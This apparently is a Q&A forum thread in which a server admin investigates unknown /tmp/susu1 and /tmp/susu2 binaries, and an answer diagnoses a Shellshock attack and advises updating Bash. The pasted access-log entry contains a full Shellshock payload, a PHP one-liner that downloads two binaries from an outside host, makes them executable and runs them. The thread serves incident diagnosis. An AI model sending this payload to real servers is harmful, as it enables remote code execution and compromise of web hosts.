# Finding the security hole that causes creating of /tmp/susu1

Tags: apache-2.2, php, security

We discovered binaries `/tmp/susu1` and `/tmp/susu2` and executed by the webserver user.

In the logs we have the following entries:

```
[24/Sep/2015:06:09:34 +0200] "GET /cgi-sys/entropysearch.cgi HTTP/1.0" 301 0 "() { :;} ;
  echo;/usr/local/bin/php -r '$a = \"http://x5d.su/s/susu1\";''$b = \"http://x5d.su/s/susu2\";
  ''$c = sys_get_temp_dir();''$d = \"susu1\";''$e = \"susu2\";''$f = \"chmod 777\";''
  $g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''
  if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''
  $g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''
  $h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"
```

But we found only the error codes 301, 302, 403, 404, 500 of such requests. No 200er code which would indicate that the hack was successful.

Is this a common security problem? How can it be fixed?
Or how can it be further tracked down?

Comment: That hack can be successful without returning a 200. Any error response may appear.

Answer (score 0):

This seems a shellshock attack, it was announced the first time on 24 September 2014 when the bash release the fix for this bug.

[from wikipedia about shellshock](https://en.wikipedia.org/wiki/Shellshock_%28software_bug%29)

> The first bug causes Bash to unintentionally execute commands when the
>   commands are concatenated to the end of function definitions stored in
>   the values of environment variables.[1](https://en.wikipedia.org/wiki/Shellshock_%28software_bug%29)[6] Within days of the
>   publication of this, intense scrutiny of the underlying design flaws
>   discovered a variety of related vulnerabilities, (CVE-2014-6277,
>   CVE-2014-6278, CVE-2014-7169, CVE-2014-7186, and CVE-2014-7187); which
>   Ramey addressed with a series of further patches.

You can check if your system is vulnerable as explained in [How to test if my server is vulnerable to the ShellShock bug?](https://serverfault.com/questions/631257/how-to-test-if-my-server-is-vulnerable-to-the-shellshock-bug)

You have to update your system or at least your Bash version to fix the problem.